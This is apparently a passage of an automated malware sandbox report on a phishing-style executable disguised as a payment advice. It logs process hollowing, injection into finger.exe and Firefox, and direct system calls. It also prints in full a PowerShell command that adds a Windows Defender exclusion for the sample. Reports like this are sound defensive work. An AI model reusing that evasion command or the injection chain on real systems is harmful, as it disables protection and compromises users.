                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01754BB0 mov eax, dword ptr fs:[00000030h]4_2_01754BB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0BBE mov eax, dword ptr fs:[00000030h]4_2_016B0BBE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0BBE mov eax, dword ptr fs:[00000030h]4_2_016B0BBE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA6F mov eax, dword ptr fs:[00000030h]4_2_016DCA6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA6F mov eax, dword ptr fs:[00000030h]4_2_016DCA6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA6F mov eax, dword ptr fs:[00000030h]4_2_016DCA6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171CA72 mov eax, dword ptr fs:[00000030h]4_2_0171CA72
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171CA72 mov eax, dword ptr fs:[00000030h]4_2_0171CA72
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174EA60 mov eax, dword ptr fs:[00000030h]4_2_0174EA60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0A5B mov eax, dword ptr fs:[00000030h]4_2_016B0A5B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0A5B mov eax, dword ptr fs:[00000030h]4_2_016B0A5B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CEA2E mov eax, dword ptr fs:[00000030h]4_2_016CEA2E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA24 mov eax, dword ptr fs:[00000030h]4_2_016DCA24
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C4A35 mov eax, dword ptr fs:[00000030h]4_2_016C4A35
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C4A35 mov eax, dword ptr fs:[00000030h]4_2_016C4A35
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172CA11 mov eax, dword ptr fs:[00000030h]4_2_0172CA11
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DAAEE mov eax, dword ptr fs:[00000030h]4_2_016DAAEE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DAAEE mov eax, dword ptr fs:[00000030h]4_2_016DAAEE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A0AD0 mov eax, dword ptr fs:[00000030h]4_2_016A0AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D4AD0 mov eax, dword ptr fs:[00000030h]4_2_016D4AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D4AD0 mov eax, dword ptr fs:[00000030h]4_2_016D4AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A8AA0 mov eax, dword ptr fs:[00000030h]4_2_016A8AA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A8AA0 mov eax, dword ptr fs:[00000030h]4_2_016A8AA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6AA4 mov eax, dword ptr fs:[00000030h]4_2_016F6AA4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AEA80 mov eax, dword ptr fs:[00000030h]4_2_016AEA80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AEA80 mov eax, dword ptr fs:[00000030h]4_2_016AEA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory written: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 7932Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
